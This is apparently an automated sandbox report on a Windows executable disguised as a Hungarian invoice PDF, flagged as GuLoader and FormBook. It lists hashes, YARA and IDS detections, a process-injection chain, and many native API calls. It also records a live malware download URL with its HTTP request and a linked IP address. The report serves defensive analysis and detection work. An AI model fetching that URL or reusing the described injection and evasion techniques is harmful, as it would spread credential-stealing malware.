Windows Analysis Report
Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe

Overview

General Information

Sample name: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
renamed because original name is a hash value
Original sample name: Rendelsi szm 11-2024-pdf.bat.exe
Analysis ID: 1562190
MD5: f669eaf2b985a35f3b1bf21d73b7caf2
SHA1: e789d818889992fae7365386a24539a4b3bf2765
SHA256: 356358084caa4c8fbc4db1da7c5a15c9566182f8193dd17a979c22d0012c5016
Tags: exe, HUN, user-smica83
Infos:

Detection

FormBook, GuLoader
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe (PID: 7048 cmdline: "C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe" MD5: F669EAF2B985A35F3B1BF21D73B7CAF2)
    • Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe (PID: 2648 cmdline: "C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe" MD5: F669EAF2B985A35F3B1BF21D73B7CAF2)
      • SkCSKJeVGx.exe (PID: 2540 cmdline: "C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • sdchange.exe (PID: 1712 cmdline: "C:\Windows\SysWOW64\sdchange.exe" MD5: 8E93B557363D8400A8B9F2D70AEB222B)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.2971931474.0000000004A30000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.2968077635.0000000033220000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.2971855670.00000000049E0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000000.00000002.2572461469.0000000004B5D000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
            No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-25T10:27:36.431130+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49813 | 103.83.194.50 | 80 | TCP

            AV Detection

            Source: http://enechado.ru.com/tk.bin, Avira URL Cloud: Label: malware
            Source: Yara matchFile source: 00000007.00000002.2971931474.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2968077635.0000000033220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2971855670.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2972278364.0000000002B40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2968622258.0000000033880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: sdchange.pdbGCTL source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2899524866.0000000003414000.00000004.00000020.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2899577369.000000000341D000.00000004.00000020.00020000.00000000.sdmp, SkCSKJeVGx.exe, 00000006.00000002.2971778579.0000000000F08000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdb source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000001.2571159157.0000000000649000.00000020.00000001.01000000.00000009.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SkCSKJeVGx.exe, 00000006.00000002.2970784574.00000000007DE000.00000002.00000001.01000000.0000000A.sdmp
            Source: Binary string: wntdll.pdbUGP source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2836177680.0000000033386000.00000004.00000020.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2833858757.00000000331DB000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2949048299.0000000004993000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2946820394.00000000047E6000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2836177680.0000000033386000.00000004.00000020.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2833858757.00000000331DB000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, sdchange.exe, 00000007.00000003.2949048299.0000000004993000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2946820394.00000000047E6000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdbUGP source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000001.2571159157.0000000000649000.00000020.00000001.01000000.00000009.sdmp
            Source: Binary string: sdchange.pdb source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2899524866.0000000003414000.00000004.00000020.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2899577369.000000000341D000.00000004.00000020.00020000.00000000.sdmp, SkCSKJeVGx.exe, 00000006.00000002.2971778579.0000000000F08000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 0_2_004065C7 FindFirstFileW,FindClose,0_2_004065C7
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405996
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Windows\SysWOW64\sdchange.exe, Code function: 4x nop then xor eax, eax (7_2_02C59EF0)
            Source: C:\Windows\SysWOW64\sdchange.exe, Code function: 4x nop then pop edi (7_2_02C5E52E)
            Source: Joe Sandbox ViewIP Address: 103.83.194.50 103.83.194.50
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49813 -> 103.83.194.50:80
            Source: global traffic, HTTP traffic detected:
                GET /tk.bin HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                Host: enechado.ru.com
                Cache-Control: no-cache
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: enechado.ru.com
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2945021346.00000000033E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://enechado.ru.com/tk.bin
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2945021346.00000000033E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://enechado.ru.com/tk.binH
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2945021346.00000000033A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://enechado.ru.com/tk.binK
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2945021346.00000000033A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://enechado.ru.com/tk.binR
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000001.2571159157.0000000000649000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000001.2571159157.00000000005F2000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000001.2571159157.00000000005F2000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000001.2571159157.0000000000649000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 0_2_0040542B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040542B

            E-Banking Fraud

            Source: Yara matchFile source: 00000007.00000002.2971931474.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2968077635.0000000033220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2971855670.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2972278364.0000000002B40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2968622258.0000000033880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A35C0 NtCreateMutant,LdrInitializeThunk,5_2_335A35C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2B60 NtClose,LdrInitializeThunk,5_2_335A2B60
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_335A2DF0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_335A2C70
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A3010 NtOpenDirectoryObject,5_2_335A3010
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A3090 NtSetValueKey,5_2_335A3090
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A39B0 NtGetContextThread,5_2_335A39B0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A3D70 NtOpenThread,5_2_335A3D70
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A3D10 NtOpenProcessToken,5_2_335A3D10
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A4340 NtSetContextThread,5_2_335A4340
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A4650 NtSuspendThread,5_2_335A4650
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2BF0 NtAllocateVirtualMemory,5_2_335A2BF0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2BE0 NtQueryValueKey,5_2_335A2BE0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2B80 NtQueryInformationFile,5_2_335A2B80
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2BA0 NtEnumerateValueKey,5_2_335A2BA0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2AD0 NtReadFile,5_2_335A2AD0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2AF0 NtWriteFile,5_2_335A2AF0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2AB0 NtWaitForSingleObject,5_2_335A2AB0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2F60 NtCreateProcessEx,5_2_335A2F60
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2F30 NtCreateSection,5_2_335A2F30
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2FE0 NtCreateFile,5_2_335A2FE0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2F90 NtProtectVirtualMemory,5_2_335A2F90
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2FB0 NtResumeThread,5_2_335A2FB0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2FA0 NtQuerySection,5_2_335A2FA0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2E30 NtWriteVirtualMemory,5_2_335A2E30
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2EE0 NtQueueApcThread,5_2_335A2EE0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2E80 NtReadVirtualMemory,5_2_335A2E80
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2EA0 NtAdjustPrivilegesToken,5_2_335A2EA0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2D10 NtMapViewOfSection,5_2_335A2D10
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2D00 NtSetInformationFile,5_2_335A2D00
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2D30 NtUnmapViewOfSection,5_2_335A2D30
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2DD0 NtDelayExecution,5_2_335A2DD0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2DB0 NtEnumerateKey,5_2_335A2DB0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2C60 NtCreateKey,5_2_335A2C60
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2C00 NtQueryInformationProcess,5_2_335A2C00
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2CC0 NtQueryVirtualMemory,5_2_335A2CC0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2CF0 NtOpenProcess,5_2_335A2CF0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A2CA0 NtQueryInformationToken,5_2_335A2CA0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_04BB2CA0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_04BB2C70
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_04BB2DF0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2D10 NtMapViewOfSection,LdrInitializeThunk,7_2_04BB2D10
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2FE0 NtCreateFile,LdrInitializeThunk,7_2_04BB2FE0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2F30 NtCreateSection,LdrInitializeThunk,7_2_04BB2F30
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2AD0 NtReadFile,LdrInitializeThunk,7_2_04BB2AD0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_04BB2BF0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2B60 NtClose,LdrInitializeThunk,7_2_04BB2B60
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB35C0 NtCreateMutant,LdrInitializeThunk,7_2_04BB35C0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB4650 NtSuspendThread,7_2_04BB4650
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB4340 NtSetContextThread,7_2_04BB4340
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2CF0 NtOpenProcess,7_2_04BB2CF0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2CC0 NtQueryVirtualMemory,7_2_04BB2CC0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2C00 NtQueryInformationProcess,7_2_04BB2C00
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2C60 NtCreateKey,7_2_04BB2C60
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2DB0 NtEnumerateKey,7_2_04BB2DB0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2DD0 NtDelayExecution,7_2_04BB2DD0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2D30 NtUnmapViewOfSection,7_2_04BB2D30
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2D00 NtSetInformationFile,7_2_04BB2D00
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2EA0 NtAdjustPrivilegesToken,7_2_04BB2EA0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2E80 NtReadVirtualMemory,7_2_04BB2E80
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2EE0 NtQueueApcThread,7_2_04BB2EE0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2E30 NtWriteVirtualMemory,7_2_04BB2E30
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2FB0 NtResumeThread,7_2_04BB2FB0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2FA0 NtQuerySection,7_2_04BB2FA0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2F90 NtProtectVirtualMemory,7_2_04BB2F90
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2F60 NtCreateProcessEx,7_2_04BB2F60
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2AB0 NtWaitForSingleObject,7_2_04BB2AB0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2AF0 NtWriteFile,7_2_04BB2AF0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2BA0 NtEnumerateValueKey,7_2_04BB2BA0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2B80 NtQueryInformationFile,7_2_04BB2B80
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB2BE0 NtQueryValueKey,7_2_04BB2BE0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB3090 NtSetValueKey,7_2_04BB3090
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB3010 NtOpenDirectoryObject,7_2_04BB3010
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB3D10 NtOpenProcessToken,7_2_04BB3D10
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB3D70 NtOpenThread,7_2_04BB3D70
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_04BB39B0 NtGetContextThread,7_2_04BB39B0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C79700 NtReadFile,7_2_02C79700
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C79590 NtCreateFile,7_2_02C79590
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C79A10 NtAllocateVirtualMemory,7_2_02C79A10
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 7_2_02C798A0 NtClose,7_2_02C798A0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, File created: C:\Windows\resources\0809
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, File created: C:\Windows\resources\0809\mysterist.ini
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336305915_2_33630591
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336224465_2_33622446
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336144205_2_33614420
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3361E4F65_2_3361E4F6
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3362AB405_2_3362AB40
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33626BD75_2_33626BD7
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356EA805_2_3356EA80
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335869625_2_33586962
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3363A9A65_2_3363A9A6
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335729A05_2_335729A0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335728405_2_33572840
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3357A8405_2_3357A840
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3359E8F05_2_3359E8F0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335568B85_2_335568B8
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335E4F405_2_335E4F40
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33612F305_2_33612F30
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33590F305_2_33590F30
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335B2F285_2_335B2F28
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33562FC85_2_33562FC8
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3357CFE05_2_3357CFE0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335EEFA05_2_335EEFA0
